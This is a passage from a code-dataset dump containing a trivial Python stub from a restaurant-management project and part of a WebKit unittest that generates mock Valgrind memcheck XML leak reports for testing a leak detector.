| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c251fa72df00bc11c03cff7feed4e410bf14bb0
| 30
|
py
|
Python
|
frontend/stock/stock_modify.py
|
Tasari/Restaurant_system
|
bc0127e0060c54c17abb7aa78800da7bd5bc12cb
|
[
"MIT"
] | null | null | null |
frontend/stock/stock_modify.py
|
Tasari/Restaurant_system
|
bc0127e0060c54c17abb7aa78800da7bd5bc12cb
|
[
"MIT"
] | null | null | null |
frontend/stock/stock_modify.py
|
Tasari/Restaurant_system
|
bc0127e0060c54c17abb7aa78800da7bd5bc12cb
|
[
"MIT"
] | null | null | null |
def stock_modify():
return
| 15
| 19
| 0.7
| 4
| 30
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 30
| 2
| 20
| 15
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
4c4797bc6acf3cdb4c896f0becfcb312dfa3df9c
| 44,003
|
py
|
Python
|
Tools/Scripts/webkitpy/port/leakdetector_valgrind_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 6
|
2021-07-05T16:09:39.000Z
|
2022-03-06T22:44:42.000Z
|
Tools/Scripts/webkitpy/port/leakdetector_valgrind_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 7
|
2022-03-15T13:25:39.000Z
|
2022-03-15T13:25:44.000Z
|
Tools/Scripts/webkitpy/port/leakdetector_valgrind_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (C) 2013 Samsung Electronics. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitcorepy import string_utils
from webkitpy.common.system.executive_mock import MockExecutive2
from webkitpy.common.system.filesystem_mock import MockFileSystem
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.port.leakdetector_valgrind import LeakDetectorValgrind
def make_mock_valgrind_output(process_name, pid, uuid):
return """<?xml version="1.0"?>
<valgrindoutput>
<protocolversion>4</protocolversion>
<protocoltool>memcheck</protocoltool>
<preamble>
<line>Memcheck, a memory error detector</line>
<line>Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.</line>
<line>Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info</line>
<line>Command: /home/user/WebKit/WebKitBuild/Release/Programs/{process_name} -</line>
</preamble>
<pid>{pid}</pid>
<ppid>18577</ppid>
<tool>memcheck</tool>
<args>
<vargv>
<exe>/usr/bin/valgrind.bin</exe>
<arg>--tool=memcheck</arg>
<arg>--num-callers=40</arg>
<arg>--demangle=no</arg>
<arg>--trace-children=no</arg>
<arg>--smc-check=all-non-file</arg>
<arg>--leak-check=yes</arg>
<arg>--leak-resolution=high</arg>
<arg>--show-possibly-lost=no</arg>
<arg>--show-reachable=no</arg>
<arg>--leak-check=full</arg>
<arg>--undef-value-errors=no</arg>
<arg>--gen-suppressions=all</arg>
<arg>--xml=yes</arg>
<arg>--xml-file=/home/user/WebKit/WebKitBuild/Release/layout-test-results/drt-{pid}-{uuid}-leaks.xml</arg>
<arg>--suppressions=/home/user/WebKit/Tools/Scripts/valgrind/suppressions.txt</arg>
<arg>--suppressions=/usr/lib/valgrind/debian-libc6-dbg.supp</arg>
</vargv>
<argv>
<exe>/home/user/WebKit/WebKitBuild/Release/Programs/{process_name}</exe>
<arg>-</arg>
</argv>
</args>
<status>
<state>RUNNING</state>
<time>00:00:00:00.024 </time>
</status>
<status>
<state>FINISHED</state>
<time>00:00:00:54.186 </time>
</status>
<error>
<unique>0x1a4</unique>
<tid>1</tid>
<kind>Leak_DefinitelyLost</kind>
<xwhat>
<text>8 bytes in 1 blocks are definitely lost in loss record 421 of 7,972</text>
<leakedbytes>8</leakedbytes>
<leakedblocks>1</leakedblocks>
</xwhat>
<stack>
<frame>
<ip>0x4C2AF8E</ip>
<obj>/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so</obj>
<fn>_Znwm</fn>
</frame>
<frame>
<ip>0x6839DEC</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation</fn>
</frame>
<frame>
<ip>0x61E7B03</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_policy_decision_new</fn>
</frame>
<frame>
<ip>0x61CBA6D</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE</fn>
</frame>
<frame>
<ip>0x683DF52</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_</fn>
</frame>
<frame>
<ip>0x6817EFC</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE</fn>
</frame>
<frame>
<ip>0x6818729</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE</fn>
</frame>
<frame>
<ip>0x6818A3A</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE</fn>
</frame>
<frame>
<ip>0x61E3148</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_frame_load_uri</fn>
</frame>
<frame>
<ip>0x44CBC9</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL7runTestRKSs</fn>
</frame>
<frame>
<ip>0x44CED6</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL20runTestingServerLoopv</fn>
</frame>
<frame>
<ip>0x43A2D3</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>main</fn>
</frame>
</stack>
<suppression>
<sname>insert_a_suppression_name_here</sname>
<skind>Memcheck:Leak</skind>
<sframe> <fun>_Znwm</fun> </sframe>
<sframe> <fun>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation</fun> </sframe>
<sframe> <fun>webkit_web_policy_decision_new</fun> </sframe>
<sframe> <fun>_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE</fun> </sframe>
<sframe> <fun>webkit_web_frame_load_uri</fun> </sframe>
<sframe> <fun>_ZL7runTestRKSs</fun> </sframe>
<sframe> <fun>_ZL20runTestingServerLoopv</fun> </sframe>
<sframe> <fun>main</fun> </sframe>
<rawtext>
<![CDATA[
{{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znwm
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_
fun:_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE
fun:_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE
fun:_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE
fun:webkit_web_frame_load_uri
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}}
]]>
</rawtext>
</suppression>
</error>
<error>
<unique>0x1a5</unique>
<tid>1</tid>
<kind>Leak_DefinitelyLost</kind>
<xwhat>
<text>8 bytes in 1 blocks are definitely lost in loss record 422 of 7,972</text>
<leakedbytes>8</leakedbytes>
<leakedblocks>1</leakedblocks>
</xwhat>
<stack>
<frame>
<ip>0x4C2AF8E</ip>
<obj>/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so</obj>
<fn>_Znwm</fn>
</frame>
<frame>
<ip>0x6839D0C</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation</fn>
</frame>
<frame>
<ip>0x61E7B03</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_policy_decision_new</fn>
</frame>
<frame>
<ip>0x61CB527</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE</fn>
</frame>
<frame>
<ip>0x6839EC0</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_</fn>
</frame>
<frame>
<ip>0x6802F6E</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE</fn>
</frame>
<frame>
<ip>0x67E59E0</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE</fn>
</frame>
<frame>
<ip>0x684C237</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE</fn>
</frame>
<frame>
<ip>0x6F95848</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv</fn>
</frame>
<frame>
<ip>0x8E2D6CA</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libgio-2.0.so.0.3800.0</obj>
<fn>g_task_return_now</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/gio</dir>
<file>gtask.c</file>
<line>1108</line>
</frame>
<frame>
<ip>0x8E2D6E8</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libgio-2.0.so.0.3800.0</obj>
<fn>complete_in_idle_cb</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/gio</dir>
<file>gtask.c</file>
<line>1117</line>
</frame>
<frame>
<ip>0x93A62F4</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libglib-2.0.so.0.3800.0</obj>
<fn>g_main_context_dispatch</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib</dir>
<file>gmain.c</file>
<line>3065</line>
</frame>
<frame>
<ip>0x93A6637</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libglib-2.0.so.0.3800.0</obj>
<fn>g_main_context_iterate.isra.23</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib</dir>
<file>gmain.c</file>
<line>3712</line>
</frame>
<frame>
<ip>0x93A6A99</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libglib-2.0.so.0.3800.0</obj>
<fn>g_main_loop_run</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib</dir>
<file>gmain.c</file>
<line>3906</line>
</frame>
<frame>
<ip>0x8121204</ip>
<obj>/home/user/WebKit/WebKitBuild/Dependencies/Root/lib64/libgtk-3.so.0.600.0</obj>
<fn>gtk_main</fn>
<dir>/home/user/WebKit/WebKitBuild/Dependencies/Source/gtk+-3.6.0/gtk</dir>
<file>gtkmain.c</file>
<line>1162</line>
</frame>
<frame>
<ip>0x44CBCE</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL7runTestRKSs</fn>
</frame>
<frame>
<ip>0x44CED6</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL20runTestingServerLoopv</fn>
</frame>
<frame>
<ip>0x43A2D3</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>main</fn>
</frame>
</stack>
<suppression>
<sname>insert_a_suppression_name_here</sname>
<skind>Memcheck:Leak</skind>
<sframe> <fun>_Znwm</fun> </sframe>
<sframe> <fun>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation</fun> </sframe>
<sframe> <fun>webkit_web_policy_decision_new</fun> </sframe>
<sframe> <fun>_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_</fun> </sframe>
<sframe> <fun>_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE</fun> </sframe>
<sframe> <fun>_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE</fun> </sframe>
<sframe> <fun>_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE</fun> </sframe>
<sframe> <fun>_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv</fun> </sframe>
<sframe> <fun>g_task_return_now</fun> </sframe>
<sframe> <fun>complete_in_idle_cb</fun> </sframe>
<sframe> <fun>g_main_context_dispatch</fun> </sframe>
<sframe> <fun>g_main_context_iterate.isra.23</fun> </sframe>
<sframe> <fun>g_main_loop_run</fun> </sframe>
<sframe> <fun>gtk_main</fun> </sframe>
<sframe> <fun>_ZL7runTestRKSs</fun> </sframe>
<sframe> <fun>_ZL20runTestingServerLoopv</fun> </sframe>
<sframe> <fun>main</fun> </sframe>
<rawtext>
<![CDATA[
{{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znwm
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_
fun:_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE
fun:_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE
fun:_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE
fun:_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv
fun:g_task_return_now
fun:complete_in_idle_cb
fun:g_main_context_dispatch
fun:g_main_context_iterate.isra.23
fun:g_main_loop_run
fun:gtk_main
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}}
]]>
</rawtext>
</suppression>
</error>
<error>
<unique>0x1a6</unique>
<tid>1</tid>
<kind>Leak_DefinitelyLost</kind>
<xwhat>
<text>8 bytes in 1 blocks are definitely lost in loss record 423 of 7,972</text>
<leakedbytes>8</leakedbytes>
<leakedblocks>1</leakedblocks>
</xwhat>
<stack>
<frame>
<ip>0x4C2AF8E</ip>
<obj>/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so</obj>
<fn>_Znwm</fn>
</frame>
<frame>
<ip>0x6839DEC</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation</fn>
</frame>
<frame>
<ip>0x61E7B03</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_policy_decision_new</fn>
</frame>
<frame>
<ip>0x61CBA6D</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE</fn>
</frame>
<frame>
<ip>0x683DF52</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_</fn>
</frame>
<frame>
<ip>0x6817EFC</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE</fn>
</frame>
<frame>
<ip>0x6818729</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE</fn>
</frame>
<frame>
<ip>0x6818A3A</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE</fn>
</frame>
<frame>
<ip>0x61E3148</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_frame_load_uri</fn>
</frame>
<frame>
<ip>0x44CC50</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL7runTestRKSs</fn>
</frame>
<frame>
<ip>0x44CED6</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL20runTestingServerLoopv</fn>
</frame>
<frame>
<ip>0x43A2D3</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>main</fn>
</frame>
</stack>
<suppression>
<sname>insert_a_suppression_name_here</sname>
<skind>Memcheck:Leak</skind>
<sframe> <fun>_Znwm</fun> </sframe>
<sframe> <fun>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation</fun> </sframe>
<sframe> <fun>webkit_web_policy_decision_new</fun> </sframe>
<sframe> <fun>_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE</fun> </sframe>
<sframe> <fun>webkit_web_frame_load_uri</fun> </sframe>
<sframe> <fun>_ZL7runTestRKSs</fun> </sframe>
<sframe> <fun>_ZL20runTestingServerLoopv</fun> </sframe>
<sframe> <fun>main</fun> </sframe>
<rawtext>
<![CDATA[
{{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znwm
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_
fun:_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE
fun:_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE
fun:_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE
fun:webkit_web_frame_load_uri
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}}
]]>
</rawtext>
</suppression>
</error>
<errorcounts>
</errorcounts>
<suppcounts>
<pair>
<count>107</count>
<name>FcConfigAppFontAddFile (Third Party)</name>
</pair>
<pair>
<count>2098</count>
<name>gtk_init_check (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>g_quark_from_static_string (Third party)</name>
</pair>
<pair>
<count>27</count>
<name>FcConfigParseAndLoad (Third Party)</name>
</pair>
<pair>
<count>80</count>
<name>webkitAccessibleNew</name>
</pair>
<pair>
<count>177</count>
<name>g_thread_proxy (Third Party)</name>
</pair>
<pair>
<count>9</count>
<name>FcPatternObjectInsertElt 2 (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>gtk_window_realize (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>__nss_database_lookup (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>cairo_set_source_surface (Third Party)</name>
</pair>
<pair>
<count>2</count>
<name>libGL.so (Third party)</name>
</pair>
<pair>
<count>1</count>
<name>g_task_run_in_thread (Third Party)</name>
</pair>
<pair>
<count>2</count>
<name>WTF::ThreadIdentifierData::initialize() (Intentional)</name>
</pair>
<pair>
<count>1</count>
<name>gtk_css_provider_load_from_data (Third Party)</name>
</pair>
<pair>
<count>1</count>
<name>libenchant.so new (Third party)</name>
</pair>
</suppcounts>
</valgrindoutput>
""".format(process_name=process_name, pid=pid, uuid=uuid)
def make_mock_incomplete_valgrind_output(process_name, pid, uuid):
return """<?xml version="1.0"?>
<valgrindoutput>
<protocolversion>4</protocolversion>
<protocoltool>memcheck</protocoltool>
<preamble>
<line>Memcheck, a memory error detector</line>
<line>Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.</line>
<line>Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info</line>
<line>Command: /home/user/WebKit/WebKitBuild/Release/Programs/{process_name} -</line>
</preamble>
<pid>{pid}</pid>
<ppid>18577</ppid>
<tool>memcheck</tool>
<args>
<vargv>
<exe>/usr/bin/valgrind.bin</exe>
<arg>--tool=memcheck</arg>
<arg>--num-callers=40</arg>
<arg>--demangle=no</arg>
<arg>--trace-children=no</arg>
<arg>--smc-check=all-non-file</arg>
<arg>--leak-check=yes</arg>
<arg>--leak-resolution=high</arg>
<arg>--show-possibly-lost=no</arg>
<arg>--show-reachable=no</arg>
<arg>--leak-check=full</arg>
<arg>--undef-value-errors=no</arg>
<arg>--gen-suppressions=all</arg>
<arg>--xml=yes</arg>
<arg>--xml-file=/home/user/WebKit/WebKitBuild/Release/layout-test-results/drt-{pid}-{uuid}-leaks.xml</arg>
